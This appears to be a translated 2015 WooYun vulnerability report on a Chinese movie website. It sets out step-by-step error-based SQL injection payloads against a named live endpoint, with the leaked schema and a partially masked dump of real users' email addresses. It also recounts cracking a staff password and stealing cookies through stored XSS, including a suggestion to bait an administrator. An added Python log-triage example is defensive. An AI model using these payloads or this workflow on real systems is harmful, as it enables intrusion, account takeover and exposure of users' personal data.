
Vulnerability summary

Defect ID: wooyun-2015-099810

Title: 电影工厂 (Movie Factory) website: stored XSS + SQL injection (manual floor()-based forced error)

Vendor: 电影工厂 (Movie Factory)

Author: 千斤拨四两

Submitted: 2015-03-09 14:57

Fix deadline: 2015-04-23 14:58

Disclosed: 2015-04-23 14:58

Vulnerability type: XSS (cross-site scripting)

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-03-09: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-04-23: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection dumps staff usernames and passwords; the message-posting feature has stored XSS, and the internal send-mail feature has stored XSS as well.

Detailed description:

URL:
http://www.dianyinggongchang.com/?c-feedback-a-addfeedback
PoC:

Dump the database version, current database and user:
cont=1' and (select 1 from (select count(*),concat(version(),0x3a,database(),0x3a,user(),0x3a,floor(rand(0)*2))x from information_schema.tables
group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '5.1.49-community:m:m@localhost:1' for key 'group_key'
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM
information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'information_schema'~1' for key 'group_key'
First schema obtained: information_schema
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '~'m'~1' for key 'group_key'
Second schema obtained: m
Dumping the tables of database m
Hex encoding of m: 0x6D
Dump the number of tables in database m:
cont= 1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.tables where
table_schema=0x6D)) from information_schema.tables limit 0,1),0x7e,0x27,floor(rand(0)*2))x from information_schema.tables group by x)a) and
'1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '22~'1' for key 'group_key'
Number of tables in database m obtained: 22
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'm_advarea~'1' for key 'group_key'
First table of database m obtained: m_advarea
Increasing the LIMIT offset in the same way dumps every table name in database m:
m_advarea
m_album
m_bulletin
m_comment
m_complaints
m_favorites
m_feedback
m_friend
m_help
m_link
m_message
m_share
m_tool
m_user
m_webinfo
m_work
p_region
s_advarea_adv
s_tool_category
s_tool_tag
s_user_actor
s_user_file
Dumping the columns of table m_user
Hex encoding of m_user: 0x6D5F75736572
Dump the number of columns in table m_user:
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct count(*) FROM information_schema.columns where
table_name=0x6D5F75736572 and table_schema=0x6D)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '17~'1' for key 'group_key'
Number of columns in table m_user obtained: 17
First column of table m_user obtained: uid
cont=1' and(select 1 from(select count(*),concat((select (select (SELECT distinct column_name FROM information_schema.columns where
table_name=0x6D5F75736572 and table_schema=0x6D limit 0,1)) from information_schema.columns limit 0,1),0x7e,0x27,floor(rand(0)*2))x from
information_schema.columns group by x)a) and '1=1&email=sample%40email.tst&uid=0
ERROR:
SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry 'uid~'1' for key 'group_key'
Continuing in the same way, the 17 columns of m_user:
uid
username
realname
sex
province
city
jobs1
jobs2
jobs3
birthday
regtime
regip
pwd
avatar
num
hots
isbirthday
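The floor(rand(0)*2) / group by probes and the 1062 "Duplicate entry" lines above are exactly what a defender should be looking for in request and application logs: each probe is recognisable on the way in, and each leaked error line carries one field of the schema on the way out. The Python below is an added example, not code from the original report or from the affected site. It flags form submissions that carry the markers of the error-based technique and recovers the value a leaked 1062 message disclosed. SAMPLE_LOG is constructed (its payload and error text are copied from the report); the REQ/ERR line prefixes, the marker set and all function names are assumptions of this example.

```python
"""Triage helpers for floor()/rand()/group-by error-based SQL injection.

Added example (not code from the original WooYun report or the affected
site). Flags requests carrying the injection markers seen in the report and
recovers the value disclosed by a leaked MySQL 1062 "Duplicate entry" error.
SAMPLE_LOG is constructed; the REQ/ERR prefixes are an assumed log format.
"""
import re
from urllib.parse import parse_qs, unquote_plus

# Markers of the floor(rand(0)*2) technique. A request is flagged only when
# several distinct markers fire, so a lone "group by" in free text stays quiet.
MARKERS = {
    "floor_rand":   re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "count_concat": re.compile(r"count\s*\(\s*\*\s*\)\s*,\s*concat\s*\(", re.I),
    "group_by":     re.compile(r"group\s+by\s+\w+\s*\)", re.I),
    "info_schema":  re.compile(r"information_schema\.", re.I),
    "quote_break":  re.compile(r"'\s*(?:and|or)\b", re.I),
}

# MySQL error 1062 as surfaced through PDO. The entry is the attacker-built
# group key: leaked value, a separator (':' or "~'"), then the floor() digit.
DUP_RE = re.compile(r"1062 Duplicate entry '(?P<entry>.*)' for key '[^']+'")


def scan_request(query_string: str) -> dict:
    """Map each parameter name to the sorted list of marker names that hit it."""
    hits = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        for raw in values:
            text = unquote_plus(raw)  # second decode catches double-encoded payloads
            fired = sorted(k for k, rx in MARKERS.items() if rx.search(text))
            if fired:
                hits[name] = fired
    return hits


def is_error_based_sqli(query_string: str, min_markers: int = 2) -> bool:
    """True when any parameter trips at least min_markers distinct markers."""
    return any(len(f) >= min_markers for f in scan_request(query_string).values())


def leaked_value(error_line: str):
    """Return what a 1062 line disclosed, or None if it is not such an error.

    Strips the trailing floor(rand(0)*2) digit and the separator before it,
    then the ~ and ' delimiters the probe wrapped around the value.
    """
    m = DUP_RE.search(error_line)
    if not m:
        return None
    entry = re.sub(r"[:~']*[01]$", "", m.group("entry"))
    return entry.strip("~'")


# Constructed sample log. Payload and error text are copied from the report;
# the third line is a benign feedback submission used as a negative control.
SAMPLE_LOG = [
    "REQ cont=1' and (select 1 from (select count(*),concat(version(),0x3a,"
    "database(),0x3a,user(),0x3a,floor(rand(0)*2))x from information_schema.tables"
    " group by x)a) and '1=1&email=sample%40email.tst&uid=0",
    "ERR SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry "
    "'5.1.49-community:m:m@localhost:1' for key 'group_key'",
    "REQ cont=Loved+the+film%2C+please+group+by+genre&email=sample%40email.tst&uid=0",
    "ERR SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry "
    "'~'information_schema'~1' for key 'group_key'",
]


def triage(lines):
    """Return (line_no, finding_kind, detail) for every suspicious line."""
    findings = []
    for n, line in enumerate(lines, 1):
        kind, _, payload = line.partition(" ")
        if kind == "REQ" and is_error_based_sqli(payload):
            findings.append((n, "sqli-probe", scan_request(payload)))
        elif kind == "ERR":
            value = leaked_value(payload)
            if value is not None:
                findings.append((n, "data-in-error", value))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(*finding)
```

Two design points matter in practice. Requiring at least two markers keeps ordinary feedback text that happens to say "group by" from being flagged, while the real probe trips all five. The 1062 parser is only a triage aid for working out what was already disclosed; the fix on the application side is a parameterised query on the feedback endpoint plus a generic error page, since returning the driver's message verbatim is what turned every probe into a one-request oracle.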


Below are the staff usernames and passwords:

Masked region
*****+-----------------*****
*****| username *****
*****+-----------------*****
*****| jayrao2008@Yahoo*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| freeguojian@foxm*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| yuyuivv8844@163.*****
*****| [email protected]*****
*****| [email protected] *****
*****| xuexd000@hotmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| zyx2236@hotmail.*****
*****| [email protected]*****
*****| yechangqing@sanm*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| jessicahfbbcwv@h*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| asd63513838@163.*****
*****| zhenganzhao@163.*****
*****| guang7846@yahoo.*****
*****| [email protected].*****
*****| szw02100210@163.*****
*****| [email protected]*****
*****| maoxiaoyang1990@*****
*****| liubinhong008@ya*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| eheart_chen@163.*****
*****| [email protected]*****
*****| waihuikoo21@163.*****
*****| haizi_504@hotmai*****
*****| sunstory0629@sin*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| 18601213469@163.*****
*****| xx.xx_xx.xx_xx.x*****
*****| [email protected]*****
*****| [email protected] *****
*****| huhaoran77@foxma*****
*****| [email protected]*****
*****| lucas.ours@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| fxg882000@yahoo.*****
*****| fxg882000@yahoo.*****
*****| [email protected]*****
*****| [email protected]*****
*****| anikijiro@gmail.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| dinggewenhua@163*****
*****| [email protected] *****
*****| blackknight_gao@*****
*****| hongshaorou1979@*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| zzzzz5qqqq4@163.*****
*****| [email protected]*****
*****| tongxiaofeng125@*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| darenyingzhi@163*****
*****| wangjie900123@12*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| xiaofenggu0307@g*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| zhurikun@fanhall*****
*****| www.498502213@qq*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| lion.brige@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| qq_dong@hotmail.*****
*****| [email protected]*****
*****| [email protected]*****
*****| xiaochuang0413@s*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| treeing616@hotma*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| donjian041218@gm*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| kevinwzj@hotmail*****
*****| [email protected] *****
*****| hezhikun1987@126*****
*****| [email protected]*****
*****| mary_871224@163.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| scz83321588@163.*****
*****| [email protected]*****
*****| yaojinglive@126.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| shuaiguoqingsy@1*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| cailipinggeili@1*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| 158621477852@163*****
*****| 158621477852@163*****
*****| liyidi1983@hotma*****
*****| gaoshuaiyouxiang*****
*****| [email protected] *****
*****| sjzez12star@163.*****
*****| watcher486@gmail*****
*****| [email protected]*****
*****| [email protected]*****
*****| 13998430333@139.*****
*****| [email protected]*****
*****| jinhongjiang88@y*****
*****| [email protected] *****
*****| aufoochu@aliyun.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| hekunyang@hotmai*****
*****| ameliagaojun@gma*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| yangyu5633@sina.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| daxingeking@163.*****
*****| [email protected]*****
*****| liangjb9527@126.*****
*****| malance1019@163.*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| louisianafrancis*****
*****| [email protected] *****
*****| [email protected]*****
*****| moguizaixinli@16*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| onlyonlycong@163*****
*****| elainejuanzi@163*****
*****| [email protected]*****
*****| [email protected]*****
*****| fanghon8994@sina*****
*****| [email protected]*****
*****| haifeng.v@gmail.*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected]*****
*****| 15815513075@126.*****
*****| [email protected]*****
*****| [email protected]*****
*****| [email protected] *****
*****| [email protected]*****
*****| [email protected] *****
*****| lanruo2005@yahoo*****
*****| aaaaliang@hotmai*****
*****| [email protected] *****
*****| [email protected] *****
*****| [email protected] *****
*****--+--------------*****


Proof of vulnerability:

Cracked a staff member's MD5 password hash, logged into the backend and posted a message:

[image: q.png]


The title field, the body and the image caption all have XSS; embed code there and look at the effect:

[image: 1.png]


Log in as another user and click through to test:

[image: 2.png]


[image: 3.png]


The cookie is captured directly.
The backend also has a send-mail feature; continue testing there:

[image: 4.png]


Log into the test user's backend and open the mail:

[image: 5.png]


[image: 6.jpg]


Cookie captured successfully:

[image: gg.png]


Haha, the test worked. If the administrator were the one being tested, the title would be rather enticing, you know what I mean!!!

Fix recommendation:

You are the experts!!!

Copyright notice: please credit the source when reposting: 千斤拨四两@乌云


Vulnerability responses

Vendor response:

Vendor could not be contacted, or vendor actively refused